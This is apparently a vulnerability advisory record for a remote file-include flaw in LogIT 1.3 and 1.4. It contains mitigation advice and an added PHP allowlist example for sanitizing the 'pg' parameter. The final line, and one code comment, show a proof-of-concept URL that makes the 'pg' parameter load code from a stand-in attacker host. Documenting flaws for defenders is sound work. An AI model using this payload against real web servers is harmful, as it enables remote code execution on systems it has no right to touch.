Vendor: LogIT
By: SecurityFocus
CVSS: 7.5 (HIGH)
Remote File Include
CWE: 98
Product Name: LogIT
Affected Version From: 1.3
Affected Version To: 1.4
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

LogIT Remote File Include Vulnerability

LogIT is prone to a remote file-include vulnerability. This issue is due to the application's failure to properly sanitize user-supplied input. Attackers may specify remotely hosted script files to be executed in the context of the webserver hosting the vulnerable software. An attacker can exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the webserver process.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
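
One way to apply this to a page parameter such as `pg`, shown as an added example that is not LogIT's own code. The page names, the `pages/` directory and the `resolve_page()` helper are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical page map: the request supplies only a key, never a path or URL.
const PAGES = [
    'home'    => 'home.php',
    'entries' => 'entries.php',
    'stats'   => 'stats.php',
];
const PAGE_DIR = __DIR__ . '/pages';

/**
 * Map the user-supplied value to a file under PAGE_DIR, or return null.
 */
function resolve_page($pg): ?string
{
    // Reject arrays (?pg[]=x) and anything that is not a short identifier.
    // A value such as "http://www.example2.com/evilcode" fails here.
    if (!is_string($pg) || !preg_match('/\A[a-z0-9_]{1,32}\z/', $pg)) {
        return null;
    }
    // Only keys present in the allowlist are ever turned into a file name.
    if (!array_key_exists($pg, PAGES)) {
        return null;
    }
    // Defense in depth: the resolved file must exist inside PAGE_DIR.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$pg]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$target = resolve_page($_GET['pg'] ?? 'home');
if ($target === null) {
    http_response_code(404);
    // Log the rejected value for detection; never echo it back unescaped.
    error_log('rejected pg value: ' . json_encode($_GET['pg'] ?? null));
    exit('Page not found');
}
require $target;
```

Setting `allow_url_include = Off` in `php.ini` additionally stops PHP from including URLs at the interpreter level, but the allowlist is still needed because that setting does not prevent inclusion of unintended local files.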
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/16932/info

LogIT versions 1.3 and 1.4 are affected by this vulnerability; other versions may also be affected.

http://www.example.com/?pg=http://www.example2.com/evilcode